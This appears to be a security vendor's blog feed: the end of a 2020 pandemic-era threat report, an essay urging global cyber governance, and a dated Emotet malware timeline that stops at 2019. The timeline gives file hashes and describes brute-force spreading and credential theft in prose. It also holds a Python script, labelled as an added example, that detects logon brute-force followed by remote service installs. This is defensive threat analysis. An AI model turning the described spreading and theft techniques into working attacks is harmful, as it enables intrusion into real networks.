One of the most popular gaming platforms, Steam, was also frequently imitated by cybercriminals: detections of fake Steam sites increased by 40% between February and April 2020. As usual, the cybercriminals’ main goal is to persuade users to visit fraudulent sites or to download and install malware, which could be anything from keyloggers to ransomware and miners.

Online cinemas

Online cinemas and streaming services were also used to lure users. Threat actors mimicked popular services, such as Netflix, Okko and IVI, to trick users, or simply used the titles of popular TV shows to name malicious files. The most popular TV shows among cybercriminals were Stranger Things, The Witcher, Sex Education and Orange Is the New Black.

This is just more proof that it is vital to use only official streaming services for watching media content and always stay alert while doing something online. In 2019, we published an extensive report on how cybercriminals had disguised malware as episodes of top TV shows. The results of the year 2020 are still waiting to be studied.

Phishing in delivery

Another topic is delivery services. As ordering food and other products online grows in popularity, the number of scams abusing this topic is growing too. One of the most common targets is Amazon customers, and to reach them phishers have used every trick in the book: fake delivery confirmations, fake alerts of suspicious activity in the Amazon account, gift card fraud, and so on. The names of other delivery services were also used in spam and phishing emails, mostly to deliver malware or links to fraudulent clones of well-known delivery websites.

Conclusion and recommendations

Overall, we have not seen anything conceptually new in the way attacks are executed or the techniques used by the attackers. Instead, we have seen them adapt to the current agenda and environment.

In the B2B sector, this manifested itself either in targeted attacks imitating email from specialized organizations, such as lures using the WHO logo and name, or in attempts to take advantage of the fact that companies rapidly transitioned to remote work, often without the time to ensure that proper security measures were in place. For example, brute-force attacks on RDP are not new, but never before have so many employees depended on this protocol. That is likely why it became a primary focus for attackers this year, as did instant messaging applications, with criminals increasingly spreading fake applications that mimicked the popular ones businesses use for remote collaboration.

While corporate and perimeter security remains important, the recent mass transition to remote work has shown all too clearly that even the best corporate security cannot compensate for a lack of user awareness. Especially with 60% of companies allowing employees to use their own devices for work, businesses must train their staff in cybersecurity best practices, so that they are aware of the risks and understand how to work securely with corporate resources. This cyberhygiene training must also be accompanied by changes in IT administration. IT needs to provide additional support to employees, making sure updates are applied on time and issues with connecting remotely are fixed promptly.

For many businesses, remote work is not a temporary solution. Many have already announced that, even after the pandemic subsides, work-from-home options and a hybrid model will become a permanent fixture of the employee experience. That means now is the time to reflect on the lessons of 2020 and begin creating a security strategy that protects you and your employees.

Moving forward, businesses will need to rethink the way their corporate networks are organized. Since not all machines are located in the office and connected to the corporate network, adjustments need to be made to ensure endpoints stay secure and corporate resources are protected. For example, organizations with a corporate VPN need to make sure that web filtering and malware scanning still apply to traffic from remote endpoints, so that nothing illicit can be downloaded over the tunnel.

The world has been becoming more digital for years, but in 2020 our entire lives moved online. Even self-described Luddites had no choice but to use digital services for shopping, business meetings and classes. And yes, cybercriminals were ready to jump on this opportunity. Attackers attempted to exploit the COVID-19 topic in every way possible, and they were quite often successful.

Part of the problem is that, when we teach good Internet safety practices, we are typically speaking to active Internet users. But the pandemic forced everyone to become an active Internet user, even those who did not want to, and they were, naturally, more vulnerable to attack.

COVID-19 will not be the last crisis, nor will it be the last one attackers exploit for personal gain. Cybercriminals will always be ready to take advantage of disruptive current events. Moving forward, no matter who you are – whether you are a novice Internet user or an experienced one, whether you spend five hours a day online or thirty minutes – you need to be ready for the unexpected in cyberspace. The year 2020 has proven that. Fortunately, staying protected against an evolving set of cyber risks does not require any high tech or advanced programming skills. It just requires a little knowledge of basic cybersafety rules.

Here are some tips to help employers and businesses stay on top of any potential IT security issues and remain productive while staff are working from home:

  • Ensure your employees have all they need to securely work from home and know who to contact if they face an IT or security issue.
  • Schedule basic security awareness training for your employees. This can be done online and cover essential practices, such as account and password management, email security, endpoint security and web browsing. Kaspersky and Area9 Lyceum have prepared a free course to help staff work safely from home.
  • Take key data protection measures including switching on password protection, encrypting work devices and ensuring data is backed up.
  • Ensure devices, software, applications and services are kept updated with the latest patches.
  • Install proven protection software, such as Kaspersky Endpoint Security Cloud, on all endpoints, including mobile devices, and switch on firewalls.
  • Ensure you have access to the latest threat intelligence to bolster your protection solution. For example, Kaspersky offers a free COVID-19-related threat data feed.
  • Double-check the protection available on mobile devices. For example, it should enable anti-theft capabilities such as remote device location, locking and wiping of data, screen locking, passwords and biometric security features like Face ID or Touch ID, as well as enable application controls to ensure only approved applications are used by employees.
  • In addition to physical endpoints, it is important to protect cloud workloads and virtual desktop infrastructure. Kaspersky Hybrid Cloud Security protects hybrid infrastructure of physical and virtual endpoints, as well as cloud workloads, whether running on-premises, in a datacenter or in a public cloud. It supports integration with major platforms such as VMware, Citrix and Microsoft, and facilitates migration from physical to virtual desktops.

While there is a lot of responsibility on employers to keep corporate devices and networks secure, Kaspersky is also offering the following recommendations for consumers and workers during their time at home:

  • Ensure your router supports and works smoothly when transmitting Wi-Fi to several devices simultaneously, even when multiple workers are online and there is heavy traffic (as is the case when using video conferencing).
  • Regularly update your router to avoid potential security issues.
  • Set up strong passwords for your router and Wi-Fi network.
  • If you can, only do work on devices provided by your employer. Putting corporate information on your personal devices could lead to potential security and confidentiality issues.
  • Do not share your work account details with anybody else, even if it seems a good idea at the time.
  • Always feel able to speak to your employer’s IT or IT security team if you have any concerns or issues while working from home.
  • Follow the rules of cyberhygiene: use strong passwords for all accounts, do not open suspicious links from emails and IMs, never install software from third-party markets, stay alert and use a reliable security solution such as Kaspersky Security Cloud.

December 7, 2020

Researchers call for a determined path to cybersecurity

Despite our continuous research efforts to detect cyberattacks and enable defense, we often feel that we, as members of a global community, are failing to achieve an adequate level of cybersecurity.

This is threatening the proper development and use of information technologies and digital assets, and as a consequence, most of society’s current and future activities, from entertainment to democratic processes, including business, healthcare and industrial production.

We believe that such a failure can be explained by a lack of global willpower, double-dealing activities, and the lack of global regulations. Here, we develop these hypotheses and outline ideas to advance cybersecurity.

What we do, and how it is failing

Kaspersky’s Global Research and Analysis Team (GReAT) is made up of cybersecurity researchers. Our shared capabilities and expertise stem from multifaceted individual experiences and perspectives that can always be traced back to strong technical backgrounds. Each and every day, our skills are focused on clear goals: to anticipate, discover, detect, track and report cyberattacks. But our activities and findings are, first and foremost, a contribution to a broader mission: to build a safer world. Since our inception more than a decade ago, we have worked very hard – from awareness raising and media interviews to embedded firmware reverse engineering, as well as incident-response support, vulnerabilities research, malicious infrastructure hunting, code similarity heuristics development, discovery of major threat actors or advanced malicious frameworks, open-sourced tools, specialized training and expert talks at world-class conferences. As far as our expertise is concerned, we believe that we provide beneficial results to our customers, partners and the global community. We know from previous collaboration and published content that our colleagues at government bodies, other cybersecurity providers and private companies work just as hard and achieve tremendous results as well.

Yet, somehow, we are still failing. Cyberattack numbers, whatever their impact, from digital activities to unwanted or disastrous effects, keep skyrocketing every year. Cybercrime has never been so prevalent and real, reaching every possible device, from IoT to supercomputers, as well as network routers, smartphones and personal computers. Cyberattacks have become a go-to companion, wherever there is malicious intent to tackle competition, hijack accounts, spy on a partner, persecute a minority, disrupt critical infrastructure, influence electoral processes, steal knowledge or obtain money. Cyber-based conflicts keep escalating, to the point where there is now a trend around the globe to proclaim that cyberwar capabilities are being developed, and kinetic force could be used as a response to cyberattacks whenever deemed fit. And ransomware or state-sponsored cyberattacks kept hitting hard even when we are all confronted with a pandemic.

Our hypotheses and beliefs

Why does all that outstanding technical effort, an abundance of cybersecurity solutions, highly skilled workforces, and decades of awareness raising fail to tackle cyberthreats? Although a lack of concern, specialized technical knowledge, skilled resources and training may have kept the defense a few steps behind for a while, we think these factors are no longer a major barrier. Instead, we believe that issues surrounding governance and a sense of responsibility are now what primarily prevent mission success.

A lack of global willpower and instruments

First of all, we believe that there is a lack of high-level global desire for cooperation and governance to properly tackle cyberattacks and protect what is at stake. We all agree that every human being should be guaranteed a minimum set of rights, that the development of nuclear warheads should be limited, if not outlawed, or that warfare should be regulated and overseen. These crucial safeguards to peace and freedom did not come about by chance; they came from political willpower, international cooperation, continuously improved governance and determined enforcement.

However, states have not yet agreed on a binding treaty, or on how existing international law applies, to keep our digital world at peace. There are regular examples demonstrating the major negative effects of cyberattacks on businesses, nations and citizens (or “civilians”), and there have been some initiatives to assess how international law would apply to cyber operations, to globally combat cybercrime, or to establish norms of responsible state behavior in cyberspace. But these initiatives are not coordinated or global enough, and they do not actually come with the expected regulations, cooperation and clear instruments to increase stability in cyberspace.

Are we waiting for more dramatic effects than those already caused by cyberattacks and cybercrime to advance cybersecurity with strong governance and regulation instruments? We believe that, on top of the intrinsic complexity of international cooperation, a crucial lack of willpower from states is preventing substantial advancement on cybersecurity.

Double-dealing

We believe that lots of players are double-dealing in the digital age. Cyberattacks appear to be highly profitable in the short-term, as they allow attackers and their sponsors to quickly and stealthily gather foreign and domestic intelligence, make money, disrupt or deter third parties, gain a strategic advantage over competitors or in warfare, circumvent regulations, or efficiently disseminate information. As a bonus, these malicious activities have a low entry cost, are subject to no monitoring, and for the most part go unattributed (thanks to, amongst other things, complex digital layers, bulletproof services and factors limiting interstate police cooperation). Therefore, perpetrators do not have to take responsibility for their actions and go unpunished – even when they do get exposed. Due to these convenient “cyber features”, state or non-state actors might easily be tempted to publicly promote and even act in favor of a safer world, while making sure they can also benefit from offensive activities that remain undetected and go unpunished. Such activities also promote the public and private development of cyberweapons, mercenary services, criminal activities, and the monetization of vulnerabilities instead of responsible disclosure. All this, in turn, harms the efforts of cybersecurity and enables proliferation.

But that’s not all when it comes to double-dealing: government bodies dedicated to cybersecurity and non-state actors can even play this dangerous game to some extent. Cybersecurity threat intelligence and data are of topmost interest to national defense and security management, as well as very valuable to the competitive cybersecurity business. It is a vital asset to the economy, and for detecting or deterring strategic threats. As a result, threat intelligence may not be shared and actioned as easily and broadly as it should, in a common determined path to cybersecurity, but might rather be guarded jealously for private interests. Private companies such as Kaspersky, however, do their best to proactively share intelligence and insights on investigations to the community for free.

Existing regulations are not (global) enough

We also feel that achieving cybersecurity is not possible without a stronger sense of responsibility from all public and private actors that play a role in the development and operation of our global digital space. Governments have already gone some way to fostering this sense over the years by creating or strengthening regulations on personal data processing or protection for critical information systems. While this has been a significant advancement towards cybersecurity, it has unfortunately not been enough.

Most of the cyberattacks we face and analyze do not actually leverage sophisticated technical vulnerabilities or tools, because they don’t need to. It is often way too easy to access the devices and networks owned by a public or private organization because elementary cybersecurity measures are still not implemented, and because the organization’s very own digital assets are not clearly identified or not controlled sufficiently. Every organization that processes digital data of personal significance, or develops or operates digital services, starting with those that benefit us the most, or contribute to our most vital needs, including governments, should be required to implement and demonstrate elementary cybersecurity frameworks. The associated regulations should be global, because cyberspace and digital assets are shared amongst all users around the world. It may not be possible to become invulnerable, but making cyberattacks more costly for the attackers while protecting our digital world a little more is doable.

On top of the lack of preventive and protective measures from many public and private organizations, another responsibility issue is blocking the road to cybersecurity. Cyberattacks cannot be carried out without leveraging publicly available commercial services, such as content hosting, development, infrastructure provision and mercenary services. First, it would seem obvious that any private organization that purposely engages in cyberattack operations or cyberweapons development should have its activities limited by regulations, and controlled by an impartial third party, in order to ensure that malicious activities are constrained by design, and that cyberweapons do not proliferate. Also, in order to maintain peace in the cyberworld, it is critical that any organization whose services are demonstrated to be leveraged to carry out cyberattacks is required to cooperate with cybersecurity organizations designated by an impartial third party, to contribute to cybersecurity investigations and demonstrate efforts to continuously prevent the malicious use of exposed services.

Digital services and information technologies that unintentionally support malicious cyber activities are – most of the time – developed to bring sound and useful outcomes. However, and for decades, vulnerability disclosures and cyberattacks have demonstrated that some technologies or uses are flawed by design and can be exploited by malicious actors. We can probably collectively accept that when the first information technologies were developed and deployed, it wasn’t easy to anticipate malicious uses, which is why cybersecurity efforts only came afterwards. But it is no longer possible nor tolerable to develop, deploy and operate technologies and services that have a global use potential, while ignoring existing threats, and without making them secure by design. Yet, even more vulnerabilities and malicious uses affect relatively modern services and technologies, from IoT and artificial intelligence systems to cloud infrastructures, robotics and new mobile networks. In order to anticipate and prevent malicious exploitation of modern technologies as much as it is reasonably possible, we believe that transparent vulnerability management and disclosure practices need to be developed further by both state and non-state actors; and that technologies or services that are used globally should be assessed by a global community of experts more often.

Last but not least, we also think that more threats could be better anticipated in the future if future generations are globally and systematically educated on information technologies and cybersecurity, whatever their origin or path. This will contribute to a safer world.

Our call and plans

It is rather unusual for cybersecurity researchers and experts to write on governance matters. We don’t pretend that our hypotheses are the most suitable, or the most comprehensive. But we definitely feel concerned, and strongly believe that the points we have raised are obstructing a common path to cybersecurity. Furthermore, we are pleased to note that most of our hypotheses and beliefs are actually shared with many others, as demonstrated in the 2020 Paris Call consultation key takeaways, or the latest reports from the UN’s OEWG on “developments in the field of information and telecommunications in the context of international security”, to which Kaspersky contributed.

We feel it is now a good time to send a call to all governments and international bodies (and ultimately any citizen) that aim for a safer world: we urge you to demonstrate more willpower, and a more determined approach to cybersecurity, by tackling the exposed causes of failure. We ask you to cooperatively choose the long-term peace of our common digital assets, over short-term nationalistic or private interests. We do our part, and we want our expert efforts to be transformed and developed further. We hope for a safer world, and a long-standing peaceful common digital space. We will never achieve this without determined leadership and a global change towards a better common behavior.

A cooperative and global governing instrument

We need strong political and technological leaders to drive governments and international bodies towards a cooperative, determined and fast-paced road to cybersecurity. In order to continuously rationalize efforts, share insights and thoughts, enable regulation, control and take global measures, we need them to build a dedicated, strong, permanent and focused international instrument.

We believe that such an instrument could be hosted by the UN, should seek to tackle the causes of the failures that we exposed, and should help governments to enforce regulations and cooperatively take measures when they are needed.

In order to ensure a cooperative approach by design, to consider the whole spectrum of what is at stake, and to truly take the transnational nature of cyberspace into consideration, we believe that such an instrument should guarantee a continuous dialogue with representatives of governments, the private sector, civil society and the technical community. This would enable the creation of cooperative task forces that would provide broad cybersecurity expertise and assessments on various matters, including preventive and protective cybersecurity measures, vulnerability research, incident response, attribution, regulation, law enforcement, security and risk assessment of modern technologies, and cyber capacity building. It would also ensure that most findings are shared across nations and among cybersecurity players.

This governing instrument should also be able to build norms and regulations, and a cooperative approach to control the attribution of cyberattacks and sanctions against non-compliant behavior or crime, risk analysis, capacity building, and education for cybersecurity.

A binding treaty of responsible behavior in cyberspace

Nearly two decades ago, the UN started to task groups of government experts (GGE) to anticipate international security developments in the field of IT, and to advance responsible state behavior in cyberspace. One of the most notable outcomes, despite GGE’s debatable results and limited reach, is the definition of 13 principles that constitute the norms of responsible behavior in cyberspace. But after more than a decade, these principles are non-binding, apply to governments only, and have only been endorsed on a voluntary basis. We believe this is not enough, and that it may reflect the lack of willpower and commitment from our governing leaders to cybersecurity.

We believe that the norms for responsible behavior in cyberspace should be further developed together with guidance on how these norms should be implemented, and should do better at including non-state actors such as the private sector, civil society and the technical community. After that they should become binding for the international community – if they remain voluntary, why should the bad guys care?

As far as private companies are concerned, the norm could set transparency and ethics baselines. We must not fail to mention Kaspersky’s own Global Transparency Initiative, which we truly believe to be a good source of inspiration for setting a number of private sector norms. This includes (but is not limited to) independent reviews of processes, security controls and software code, relocation of data processing, as well as the ability for trusted partners, customers and government stakeholders to directly access and check software code or threat detection rules. A code of ethics or ethics principles, from the “FIRST” international CSIRTs community or from Kaspersky, that tackle the responsible disclosure of security vulnerabilities, could also be leveraged as inspiration for private company norms.

Global regulations and shared means for cybersecurity

In order to tackle residual double-dealing issues and regulation needs that we exposed in our hypotheses, the global governing instrument or guidance should build and support further common regulations, on top of the previously mentioned norms of behavior. Such global regulations would ensure a consistent baseline of security requirements, to prevent proliferation of cyberweapons, prevent and firmly condemn cyberattacks, implement cybersecurity controls, foster responsibility and facilitate cooperation. How, where, and under which terms this governing instrument or guidance can be established should be a discussion for both state and non-state actors to ensure that we all fully recognize our responsibility to keep the digital space secure.

Conclusion

We deal with cyberattacks of all kinds every day and monitor their context from various sources. Over the years, we have seen more and more malicious activities from more and more actors, but global cybersecurity has reached a ceiling, and it appears that the potential for cyber-based conflicts is still growing. During the COVID-19 pandemic we have once again observed just how vital information technologies and digital assets are to democracy, the economy, the development of society, security and entertainment.

We believe that now is still a good time for world leaders, international and regional organizations, the private sector, the technical community and civil society to collaborate on achieving long-term peace in cyberspace rather than focusing on the short-term interests of individual countries or private organizations.

December 4, 2020

The chronicles of Emotet

More than six years have passed since the banking Trojan Emotet was first detected. During this time it has repeatedly mutated, changed direction, acquired partners, picked up modules, and generally been the cause of high-profile incidents and multimillion-dollar losses. The malware is still in fine fettle, and remains one of the most potent cybersecurity threats out there. The Trojan is distributed through spam, which it sends itself, and can spread over local networks and download other malware.

All its “accomplishments” have been described thoroughly in various publications and reports from companies and independent researchers. This being the case, we decided to summarize and collect in one place everything that is currently known about Emotet.

2014

June

Emotet was first discovered in late June 2014 by TrendMicro. The malware hijacked user banking credentials using the man-in-the-browser technique. Even in those early days, the malware was multicomponent: browser traffic was intercepted by a separate module downloaded from the C&C server. Its configuration file with web injections was also loaded from there. The banker’s main targets were clients of German and Austrian banks, and its main distribution vector was spam disguised as bank emails with malicious attachments or links to a ZIP archive containing an executable file.

Examples of malicious emails with link and attachment

November

In the fall of 2014, we discovered a modification of Emotet with the following components:

  • Module for modifying HTTP(S) traffic
  • Module for collecting email addresses in Outlook
  • Module for stealing accounts in Mail PassView (a password recovery tool)
  • Spam module (downloaded additionally as an independent executable file from addresses not linked to C&C)
  • Module for organizing DDoS attacks

We came across the latter bundled with other malware, and assume that it was added to Emotet with a cryptor (presumably back then Emotet’s authors did not have their own and so used a third-party one, possibly hacked or stolen). It is entirely possible that the developers were unaware of its presence in their malware. In any event, this module’s C&C centers were not responsive, and it itself was no longer updated (compilation date: October 19, 2014).

In addition, the new modification had begun to employ techniques to steal funds from victims’ bank accounts automatically, using the so-called Automatic Transfer System (ATS). You can read more about this modification in our report.

December

The C&C servers stopped responding and the Trojan’s activity dropped off significantly.

2015

January

In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.

June

The C&C servers again became unavailable, this time for 18 months. Judging by the configuration file with web injects, the Trojan’s most recent victims were clients of Austrian, German and Polish banks.

2016

December

Emotet redux: for the first time in a long while, a new modification was discovered. This version infected web-surfing victims using the RIG-E and RIG-V exploit kits. This distribution method had not been used by the Trojan before and, looking ahead, would not be employed again. We believe that this was a trial attempt at a new distribution mechanism, which did not pass muster with Emotet’s authors.

The C&C communication protocol in this modification was also changed: for amounts of data less than 4 KB, a GET request was used, and the data itself was transmitted in the Cookie field of the HTTP header. For larger amounts, a POST request was used. The RC4 encryption algorithm had been replaced by AES, with the protocol itself based on a slightly modified Google Protocol Buffer. In response to the request, the C&C servers returned a header with a 404 Not Found error, which did not prevent them from transmitting the encrypted payload in the body of the reply.

Examples of GET and POST requests used by Emotet

The set of modules sent to the Trojan from C&C was different too:

  • Out was the module for intercepting and modifying HTTP(S) traffic
  • In was a module for harvesting accounts and passwords from browsers (WebBrowserPassView)

2017

February

Up until now, we had no confirmation that Emotet could send spam independently. A couple of months after the C&C servers kicked back into life, we got proof when a spam module was downloaded from there.

April

In early April, a large amount of spam was seen targeting users in Poland. Emails sent in the name of logistics company DHL asked recipients to download and open a “report” file in JavaScript format. Interestingly, the attackers did not try the further trick of hiding the executable JavaScript as a PDF. The calculation seemed to be that many users would simply not know that JavaScript is not at all a document or report file format.

Example of JS file names used:
dhl__numer__zlecenia___4787769589_____kwi___12___2017.js (MD5:7360d52b67d9fbb41458b3bd21c7f4de)

In April, a similar attack involving fake invoices targeted British-German users.

invoice__924__apr___24___2017___lang___gb___gb924.js (MD5:e91c6653ca434c55d6ebf313a20f12b1)
telekom_2017_04rechnung_60030039794.js (MD5:bcecf036e318d7d844448e4359928b56)

Then in late April, the tactics changed slightly when the spam emails were supplemented with a PDF attachment which, when opened, informed the user that the report in JavaScript format was available for download via the given link.

Document_11861097_NI_NSO___11861097.pdf (MD5: 2735A006F816F4582DACAA4090538F40)

Example of PDF document contents

Document_43571963_NI_NSO___43571963.pdf (MD5: 42d6d07c757cf42c0b180831ef5989cb)

Example of PDF document contents

As for the JavaScript file itself, it was a typical Trojan-Downloader that downloaded and ran Emotet. Having successfully infected the system, the script showed the user a pretty error window.

Error message displayed by the malicious JavaScript file

May

In May, the scheme for distributing Emotet via spam changed slightly. This time, the attachment contained an Office document (or link to it) with an image disguised as an MS Word message saying something about the version of the document being outdated. To open the document, the user was prompted to enable macros. If the victim did so, a malicious macro was executed that launched a PowerShell script that downloaded and ran Emotet.

Screenshot of the opened malicious document ab-58829278.dokument.doc (MD5: 21542133A586782E7C2FA4286D98FD73)

Also in May, it was reported that Emotet was downloading and installing the banking Trojan Qbot (or QakBot). However, we cannot confirm this information: among the more than 1.2 million users attacked by Emotet, Qbot was detected in only a few dozen cases.

June

Starting June 1, a tool for spreading malicious code over a local network (Network Spreader), which would later become one of the malware modules, began being distributed from Emotet C&C servers. The malicious app comprised a self-extracting RAR archive containing the files bypass.exe (MD5: 341ce9aaf77030db9a1a5cc8d0382ee1) and service.exe (MD5: ffb1f5c3455b471e870328fd399ae6b8).

Self-extracting RAR archive with bypass.exe and service.exe

bypass.exe:

  • Searches network resources by brute-forcing passwords using a built-in dictionary
  • Copies service.exe to a suitable resource
  • Creates a service on the remote system to autorun service.exe

Screenshot of the function for creating the service (bypass.exe)

Screenshot with a list of brute-force passwords (bypass.exe)

In terms of functionality, service.exe is extremely limited and only sends the name of the computer to the cybercriminals’ server.

Function for generating data to be sent to C&C

Function for sending data to C&C

The mailing was obviously a test version, and the very next day we detected an updated version of the file. The self-extracting archive had been furnished with a script for autorunning bypass.exe (MD5: 5d75bbc6109dddba0c3989d25e41851f), which had not undergone changes, while service.exe (MD5: acc9ba224136fc129a3622d2143f10fb) had grown in size by several dozen times.

Self-extracting RAR archive with bypass.exe and service.exe

The updated service.exe was larger because its body now contained a copy of Emotet. A function was added to save Emotet to disk and run it before sending data about the infected machine to C&C.

New functions in service.exe for saving Emotet to disk and running it
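The spreader behaviour described above (a dictionary attack against network resources, then a copy of service.exe and a new service on the remote host) leaves a recognizable trace in Windows event logs. The following is an added, defender-side example written for this summary; it is not Emotet code and not a Kaspersky tool. Event IDs 4625 (failed logon), 4624 (successful logon) and 7045 (new service installed) are real Windows event IDs; the record layout, hostnames, thresholds and windows are assumptions, and the events themselves are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FAILED_LOGON = 4625       # Security log: an account failed to log on
SUCCESS_LOGON = 4624      # Security log: an account successfully logged on
SERVICE_INSTALLED = 7045  # System log: a new service was installed on this host

# Constructed sample events (not real telemetry). Fields: timestamp, event id,
# source host (where the logon attempt came from), target host, detail string
# (account name for logon events, service image name for 7045).
SAMPLE_EVENTS = [
    (f"2017-06-01 10:00:{s:02d}", FAILED_LOGON, "WS-17", "FILESRV-01", "Administrator")
    for s in range(1, 13)  # twelve failures in twelve seconds: a dictionary run
] + [
    ("2017-06-01 10:00:15", SUCCESS_LOGON, "WS-17", "FILESRV-01", "Administrator"),
    ("2017-06-01 10:00:40", SERVICE_INSTALLED, "FILESRV-01", "FILESRV-01", "service.exe"),
    # benign noise: a user mistyping a password twice, then getting in
    ("2017-06-01 10:05:00", FAILED_LOGON, "WS-03", "FILESRV-01", "jdoe"),
    ("2017-06-01 10:05:09", FAILED_LOGON, "WS-03", "FILESRV-01", "jdoe"),
    ("2017-06-01 10:05:20", SUCCESS_LOGON, "WS-03", "FILESRV-01", "jdoe"),
]


def detect_spreader(events, window=timedelta(minutes=2), threshold=10,
                    followup=timedelta(minutes=5)):
    """Return one finding per (source, target) pair showing a burst of failed
    logons. Severity is raised when the burst is followed, within `followup`,
    by a successful logon from the same source and a service installation on
    the target, which is the bypass.exe -> service.exe sequence."""
    parsed = sorted(
        (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), eid, src, dst, detail)
        for ts, eid, src, dst, detail in events
    )
    failures = defaultdict(list)
    for ts, eid, src, dst, _ in parsed:
        if eid == FAILED_LOGON:
            failures[(src, dst)].append(ts)

    findings = []
    for (src, dst), times in failures.items():
        # sliding window: first run of >= threshold failures inside `window`
        burst_end = None
        for i in range(len(times)):
            j = i
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            if j - i >= threshold:
                burst_end = times[j - 1]
                break
        if burst_end is None:
            continue

        finding = {"source": src, "target": dst,
                   "failed_logons": len(times), "severity": "brute_force"}
        deadline = burst_end + followup
        logged_in = any(
            eid == SUCCESS_LOGON and s == src and d == dst and burst_end <= ts <= deadline
            for ts, eid, s, d, _ in parsed
        )
        service = next(
            (detail for ts, eid, _s, d, detail in parsed
             if eid == SERVICE_INSTALLED and d == dst and burst_end <= ts <= deadline),
            None,
        )
        if logged_in and service:
            finding["severity"] = "lateral_movement"
            finding["service_image"] = service
        elif logged_in:
            finding["severity"] = "brute_force_success"
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in detect_spreader(SAMPLE_EVENTS):
        print(f)
```

The two-failure "jdoe" sequence stays below the threshold and is not reported; the twelve-failure run from WS-17 is reported as lateral movement because a logon and a 7045 on the target follow it within the window. In practice the 4625 and 7045 records come from different hosts and logs, so the correlation has to be done centrally.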

July

An update to the Emotet load module was distributed over the botnet. One notable change: Emotet had dropped GET requests with data transfer in the Cookie field of the HTTP header. Henceforth, all C&C communication used POST (MD5: 643e1f4c5cbaeebc003faee56152f9cb).

August

Network Spreader was included in the Emotet “distribution kit” as a DLL (MD5: 9c5c9c4f019c330aadcefbb781caac41). The compilation date of the new module is July 24, 2017, but we obtained it only in August. Recall that it used to be a self-extracting RAR archive with two files: bypass.exe and service.exe. The distribution mechanism did not change much, but the list of brute-force passwords was expanded significantly, to exactly 1,000.

Screenshot of the decrypted password list

November

In November 2017, IBM X-Force published a report about the new IcedId banker. According to the researchers, Emotet had been observed spreading it. We got our hands on the first IcedId sample (MD5: 7e8516db16b18f26e504285afe4f0b21) in April, and discovered back then that it was wrapped in a cryptor also used in Emotet. The cryptor was not just similar, but a near byte-for-byte copy of the one in the Emotet sample (MD5: 2cd1ef13ee67f102cb99b258a61eeb20), which was being distributed at the same time.

2018

January

Emotet started distributing the banking Trojan Panda (Zeus Panda). First discovered in 2016 and based on the leaked Zbot banker source code, Panda carries out man-in-the-browser attacks and intercepts keystrokes and input form content on websites.

April

April 9

In early April, Emotet acquired a module for distribution over wireless networks (MD5: 75d65cea0a33d11a2a74c703dbd2ad99), which tried to access Wi-Fi using a dictionary attack. Its code resembled that of the Network Spreader module (bypass.exe), which had been supplemented with Wi-Fi connection capability. If the brute-force was successful, the module transmitted data about the network to C&C.

Like bypass.exe, the module was distributed as a separate file (a.exe) inside a self-extracting archive (MD5: 5afdcffca43f8e7f848ba154ecf12539). The archive also contained the above-described service.exe (MD5: 5d6ff5cc8a429b17b5b5dfbf230b2ca4), which, like its first version, could do nothing except send the name of the infected computer to C&C.

Self-extracting RAR archive with a component for distribution over Wi-Fi

The cybercriminals quickly updated the module, and within a few hours of detecting the first version we received an updated self-extracting archive (MD5: d7c5bf24904fc73b0481f6c7cde76e2a) containing a new service.exe with Emotet inside (MD5: 26d21612b676d66b93c51c611fa46773).

Self-extracting RAR archive with updated service.exe

The module was first publicly described only in January 2020, by Binary Defense. The return to the old distribution mechanism and the use of code from old modules looked a little strange, since back in 2017 bypass.exe and service.exe had been merged into one DLL module.

April 14

Emotet again started using GET requests with data transfer in the Cookie field of the HTTP header for data sizes of less than 1 KB, alongside POST requests for larger amounts of data (MD5: 38991b639b2407cbfa2e7c64bb4063c4). The template for filling the Cookie field was also different: where earlier it took the form Cookie: %X=, it was now Cookie: %u =. The newly added space between the number and the equals sign helped to identify Emotet traffic.

Example of a GET request

April 30

The C&C servers suspended their activity and resumed it only on May 16, after which the space in the GET request had gone.

Example of a corrected GET request

June

Yet another banking Trojan started using Emotet to propagate itself. This time it was Trickster (or Trickbot) — a modular banker known since 2016 and the successor to the Dyreza banker.

July

The so-called UPnP module (MD5: 0f1d4dd066c0277f82f74145a7d2c48e), based on the libminiupnpc package, was obtained for the first time. The module enabled port forwarding on the router at the request of a host in the local network. This allowed the attackers not only to gain access to local network computers located behind NAT, but to turn an infected machine into a C&C proxy.

August

In August, there appeared reports of infections by the new Ryuk ransomware — a modification of the Hermes ransomware known since 2017. It later transpired that the chain of infection began with Emotet, which downloaded Trickster, which in turn installed Ryuk. Both Emotet and Trickster by this time had been armed with functions for distribution over a local network, plus Trickster exploited known vulnerabilities in SMB, which further aided the spread of the malware across the local network. Coupled with Ryuk, it made for a killer combination.

At the end of the month, the list of passwords in the Network Spreader module was updated. They still numbered 1,000, but about 100 had been changed (MD5: 3f82c2a733698f501850fdf4f7c00eb7).

Screenshot of the decrypted password list

October

October 12

The C&C servers suspended their activity, and we registered no distribution of new modules or updates. Activity resumed only on October 26.

October 30

The data exfiltration module for Outlook (MD5:64C78044D2F6299873881F8B08D40995) was updated. The key innovation was the ability to steal the contents of the message itself. All the same, the amount of stealable data was restricted to 16 KB (larger messages were truncated).

Comparison of the code of the old and new versions of the data exfiltration module for Outlook

November

The C&C servers suspended their activity, and we registered no distribution of new modules or updates. Activity resumed only on December 6.

December

More downtime; C&C activity resumed only on January 10, 2019.

2019

March

March 14

Emotet again modified a part of the HTTP protocol, switching to POST requests and using a dictionary to create the path. The Referer field was now filled, and Content-Type: multipart/form-data appeared (MD5: beaf5e523e8e3e3fb9dc2a361cda0573).

Code of the POST request generation function

Example of a POST request

March 20

Yet another change in the HTTP part of the protocol. Emotet dropped Content-Type: multipart/form-data. The data itself was encoded using Base64 and UrlEncode (MD5: 98fe402ef2b8aa2ca29c4ed133bbfe90).


Code of the updated POST request generation function

Example of a POST request

April

The first reports appeared that information stolen by the new data exfiltration module for Outlook was being used in Emotet spam mailings: the use of stolen topics, mailing lists and message contents was observed in emails.

May

The C&C servers stopped working for quite some time (three months). Activity resumed only on August 21, 2019. Over the following few weeks, however, the servers only distributed updates and modules with no spam activity being observed. The time was likely spent restoring communication with infected systems, collecting and processing data, and spreading over local networks.

November

